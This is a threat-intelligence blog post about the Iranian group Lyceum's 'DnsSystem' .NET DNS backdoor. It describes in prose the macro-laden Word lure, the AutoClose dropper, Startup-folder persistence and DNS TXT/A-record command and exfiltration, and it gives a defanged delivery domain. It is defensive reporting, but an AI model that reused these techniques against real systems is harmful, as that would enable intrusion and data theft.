Zscaler recently reported on a new .NET DNS backdoor “DnsSystem” used by the threat actor group known as Lyceum. It is primarily used to target entities in the Middle East.
- Iranian threat actor group Lyceum is using the “DnsSystem” .NET DNS backdoor to target entities in the Middle East.
- The malware is based on the legitimate DIG.net tool.
- The malware is delivered via a maldoc.
- The malware leverages DNS hijacking.
Zscaler recently investigated a campaign in which Lyceum used a new .NET DNS backdoor known as “DnsSystem”. The backdoor is a customized version of the open-source tool DIG.net (DnsDig). DIG.net is a legitimate open-source DNS resolver used to perform DNS queries on a DNS server to parse the response. The threat actors have modified the code, allowing them to perform DNS queries against the custom DNS server, parse the response to execute commands remotely, and upload and download files from the C2. The malware uses TXT records for incoming commands and A records for data exfiltration.
The .NET DNS backdoor is delivered via a macro-enabled malicious Word document masquerading as a news report on military affairs. The file was downloaded from http://news-spot[.]live. After the victim enables the macro, an AutoOpen() function executes, increasing picture brightness using “PictureFormat.Brightness = 0.5.” This reveals content with the headline, “Iran Deploys Drones To Target Internal Threat, Protect External Interests.”
The threat actor then uses the AutoClose() function to drop the backdoor on the system. When the document is closed, the AutoClose() function is executed, reading a PE file from one of the text boxes in the document. This file is written to the Startup folder to allow the malware to maintain persistence. This ensures the backdoor is executed whenever the system restarts. The dropped binary is “DnsSystem”, the .NET DNS backdoor.
The malware uses DNS hijacking. In DNS hijacking, a threat actor-controlled DNS server manipulates responses to DNS queries and resolves them as the threat actor chooses. To evade detection, the “DnsSystem” backdoor employs the DNS protocol for C2.
Who is Lyceum?
Lyceum, also known as Hexane, Spirlin, and Siamese Kitten,, is an Iranian threat actor group active since at least 2017. The group typically targets energy and telecommunications organizations in the Middle East and Africa. Their TTPs include supply chain attacks, Shark, Milan, heavy use of .NET based malware, DanBot, C++ backdoors, and a PowerShell script .
PolySwarm has multiple samples of Lyceum .NET DNS Backdoor “DnsSystem”.
You can use the following CLI command to search for all Lyceum .NET DNS Backdoor samples in our portal:
$ polyswarm link list -f DnsSystem
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at firstname.lastname@example.org | Check out our blog | Subscribe to our reports